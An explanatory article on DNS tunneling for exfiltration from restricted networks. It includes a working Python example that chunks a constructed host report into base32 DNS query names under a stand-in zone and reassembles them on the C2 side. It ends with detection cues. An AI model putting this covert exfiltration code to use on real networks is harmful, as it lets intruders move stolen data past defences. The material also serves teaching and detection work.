Criminals constantly change their modus operandi, using different strategies and techniques to compromise their targets and exfiltrate data from internal networks, even under the most restrictive conditions. For example, if outbound TCP traffic is blocked by default, a malicious agent installed on a target cannot talk to its C2 server directly. In such scenarios, other protocols that are usually still allowed out, such as ICMP and DNS, can become the vehicle for carrying internal information past those barriers.
What is the DNS protocol?
The DNS protocol is increasingly used as a pathway for data exfiltration, including by devices that an intruder has already infected during earlier stages of the attack. DNS tunneling encapsulates the attacker's traffic inside DNS queries and responses on port 53, traffic that most networks must allow outbound and that firewalls, even next-generation ones, frequently pass with little or no content inspection.
Malicious software can take advantage of the DNS protocol with specially crafted requests, sending only small, well-defined chunks of data interleaved with what looks like legitimate DNS traffic. Figure 1 below shows how basic data about a target machine could be sent from the internal agent to its C2 server on the internet.
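The chunking described above, as an added example that is not part of the original article: the agent side base32-encodes each chunk of the machine report into a single DNS label, tags it with a sequence number, and wraps it in an ordinary A query; the C2 side, acting as the authoritative server for the zone, reads the names back out of the packets and reassembles the payload. The zone `exfil.example.test` and the machine report are assumptions constructed for this example, not taken from the article.

```python
import base64
import struct

# RFC 1035 limits: a label is at most 63 octets and a name at most 255 octets
# on the wire (253 characters in dotted text form).
MAX_LABEL = 63
MAX_NAME = 253

# Hypothetical attacker-controlled zone whose authoritative server is the C2
# (assumption for this example; not from the original article).
ZONE = "exfil.example.test"

# Constructed sample of "basic data about a target machine" the agent would report.
CONSTRUCTED_REPORT = b"host=WS-0042;user=jdoe;os=Windows 10;ip=10.0.0.42"


def encode_chunks(data: bytes, zone: str, chunk_size: int = 30) -> list[str]:
    """Agent side: split data into chunks and wrap each one in a query name under zone.

    Each name looks like  <seq>-<total>.<base32 chunk>.<zone>  so the C2 can
    reorder and reassemble. 30 raw bytes become 48 base32 characters, which
    stays under the 63-octet label limit.
    """
    if (chunk_size * 8 + 4) // 5 > MAX_LABEL:
        raise ValueError("chunk_size too large for one label")
    total = (len(data) + chunk_size - 1) // chunk_size
    names = []
    for seq, offset in enumerate(range(0, len(data), chunk_size)):
        chunk = data[offset:offset + chunk_size]
        # base32 survives case folding by resolvers; '=' padding is not a
        # valid label character, so strip it here and restore it on the C2 side.
        label = base64.b32encode(chunk).decode("ascii").rstrip("=").lower()
        name = f"{seq}-{total}.{label}.{zone}"
        if len(name) > MAX_NAME:
            raise ValueError("query name too long")
        names.append(name)
    return names


def decode_names(names: list[str], zone: str) -> bytes:
    """C2 side: pick out tunnel queries for zone and reassemble the payload."""
    suffix = "." + zone
    pieces: dict[int, bytes] = {}
    total = None
    for name in names:
        if not name.endswith(suffix):
            continue  # unrelated query reaching the same server
        counter, label = name[: -len(suffix)].split(".", 1)
        seq, total = (int(x) for x in counter.split("-"))
        padded = label.upper() + "=" * (-len(label) % 8)
        pieces[seq] = base64.b32decode(padded)
    if total is None or len(pieces) != total:
        raise ValueError("incomplete transfer")
    return b"".join(pieces[i] for i in range(total))


def build_query(name: str, txid: int) -> bytes:
    """Agent side: a standard recursive A query (RFC 1035 section 4.1) for name.

    Nothing in the packet is unusual; only the QNAME carries the payload.
    """
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD=1, QDCOUNT=1
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split("."))
    return header + qname + b"\x00" + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN


def parse_query_name(packet: bytes) -> str:
    """Server side: read the QNAME out of a query packet (no compression in questions)."""
    labels, pos = [], 12  # question section starts right after the 12-byte header
    while packet[pos] != 0:
        length = packet[pos]
        labels.append(packet[pos + 1:pos + 1 + length].decode("ascii"))
        pos += 1 + length
    return ".".join(labels)


def roundtrip(data: bytes = CONSTRUCTED_REPORT, zone: str = ZONE) -> bytes:
    """Agent encodes and sends; C2 receives the queries (possibly out of order) and rebuilds."""
    packets = [build_query(n, txid) for txid, n in enumerate(encode_chunks(data, zone))]
    received = [parse_query_name(p) for p in reversed(packets)]  # simulate reordering
    return decode_names(received, zone)


if __name__ == "__main__":
    for n in encode_chunks(CONSTRUCTED_REPORT, ZONE):
        print(n)
    print(roundtrip())
```

Two things in the generated names are what a detection engineer would key on: the subdomain labels are long, high-entropy and never repeat, and the number of distinct names queried under one zone grows with the amount of data being moved, which is exactly the pattern DNS-tunnel detections look for.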